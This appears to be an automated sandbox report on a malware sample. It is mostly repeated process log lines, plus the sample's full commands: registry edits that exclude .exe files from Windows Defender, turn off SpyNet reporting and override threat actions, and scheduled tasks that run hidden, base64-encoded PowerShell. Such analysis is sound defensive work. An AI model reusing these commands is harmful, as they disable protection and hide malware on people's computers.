Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 Thread sleep count: 2463 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2463
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040553A FindFirstFileA,1_2_0040553A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,1_2_004055DE
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: file.exe Binary or memory string: V{TvMci:
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041584A SetUnhandledExceptionFilter,1_2_0041584A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041585C SetUnhandledExceptionFilter,1_2_0041585C

HIPS / PFW / Operating System Protection Evasion

Source: unknown Process created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gahelfxgt" /sc once /st 12:43:49 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
